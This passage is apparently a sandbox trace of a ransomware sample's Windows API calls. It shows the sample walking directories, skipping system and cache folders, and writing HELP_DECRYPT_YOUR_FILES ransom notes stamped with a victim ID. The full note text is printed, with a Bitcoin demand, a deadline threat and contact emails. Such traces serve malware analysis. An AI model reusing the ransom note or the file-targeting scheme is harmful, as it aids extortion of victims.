	[0166.179] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 0
	[0166.179] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0166.179] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0166.180] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c818d69, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7c818d69, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c83edb5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.180] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c818d69, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7c818d69, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c818d69, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.180] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1
	[0166.180] lstrcmpW (lpString1="Integration", lpString2="..") returned 1
	[0166.180] lstrcmpW (lpString1="Integration", lpString2=".") returned 1
	[0166.180] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData"
	[0166.180] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\"
	[0166.180] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\", lpString2="Integration" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration"
	[0166.180] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration"
	[0166.181] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\"
	[0166.181] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\"
	[0166.181] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*"
	[0166.181] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0166.192] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*") returned 67
	[0166.192] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.192] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*", cchLength=0x43 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*") returned 0x43
	[0166.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.193] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="windows") returned 0x0
	[0166.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.193] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="boot") returned 0x0
	[0166.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.193] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="system volume information") returned 0x0
	[0166.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.195] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.195] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="temp") returned 0x0
	[0166.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.195] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="program files") returned 0x0
	[0166.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.195] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.196] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="appdata") returned 0x0
	[0166.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.196] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="application data") returned 0x0
	[0166.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.196] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="winnt") returned 0x0
	[0166.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.197] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="tmp") returned 0x0
	[0166.197] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.197] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="cache") returned 0x0
	[0166.197] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.197] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.197] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.197] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="webcache") returned 0x0
	[0166.198] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.198] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="inetcache") returned 0x0
	[0166.198] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.198] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="nvidia") returned 0x0
	[0166.198] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.198] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="packages") returned 0x0
	[0166.198] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.198] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="cookies") returned 0x0
	[0166.199] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.199] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="programdata") returned 0x0
	[0166.199] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.199] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 1
	[0166.199] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 0
	[0166.199] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0166.200] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0166.200] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration"
	[0166.200] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*"
	[0166.200] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.200] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.201] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\HELP_DECRYPT_YOUR_FILES.TXT") returned 91
	[0166.201] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.202] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.202] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.332] CloseHandle (hObject=0x390) returned 1
	[0166.333] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.334] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0166.335] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.335] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.336] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.336] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.336] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0166.336] CloseHandle (hObject=0x390) returned 1
	[0166.337] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.337] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.337] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.337] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\HELP_DECRYPT_YOUR_FILES.HTML") returned 92
	[0166.337] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.342] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.342] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0166.346] CloseHandle (hObject=0x390) returned 1
	[0166.347] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.347] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.348] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.348] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0166.349] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.349] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.350] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.350] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.350] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0166.350] CloseHandle (hObject=0x390) returned 1
	[0166.351] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7cac780b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0166.351] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*") returned 67
	[0166.352] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.352] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*", cchLength=0x43 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*") returned 0x43
	[0166.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.352] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="windows") returned 0x0
	[0166.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.352] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="boot") returned 0x0
	[0166.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.353] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="system volume information") returned 0x0
	[0166.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.353] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.353] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="temp") returned 0x0
	[0166.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.353] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="program files") returned 0x0
	[0166.354] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.354] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.354] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.354] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="appdata") returned 0x0
	[0166.354] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.354] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="application data") returned 0x0
	[0166.354] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.355] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="winnt") returned 0x0
	[0166.355] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.355] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="tmp") returned 0x0
	[0166.355] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.355] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="cache") returned 0x0
	[0166.355] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.355] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.356] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.356] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="webcache") returned 0x0
	[0166.356] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.356] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="inetcache") returned 0x0
	[0166.356] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.356] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="nvidia") returned 0x0
	[0166.356] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.357] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="packages") returned 0x0
	[0166.357] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.357] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="cookies") returned 0x0
	[0166.357] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.357] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\*.*", lpSrch="programdata") returned 0x0
	[0166.357] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.357] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.358] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7cac780b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
